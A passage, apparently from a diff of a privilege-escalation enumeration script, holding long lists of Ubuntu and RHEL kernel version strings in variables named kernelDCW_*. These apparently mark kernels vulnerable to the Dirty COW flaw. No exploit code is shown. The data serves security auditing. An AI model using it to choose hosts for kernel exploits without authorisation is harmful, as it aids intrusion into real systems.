3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24" +kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual" +kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual" +kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic" +kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic" +kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic" +kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic" +kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency" +kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic" +kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic" +kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" +kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" +kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5" +kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5" +kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5" +kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6" +kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.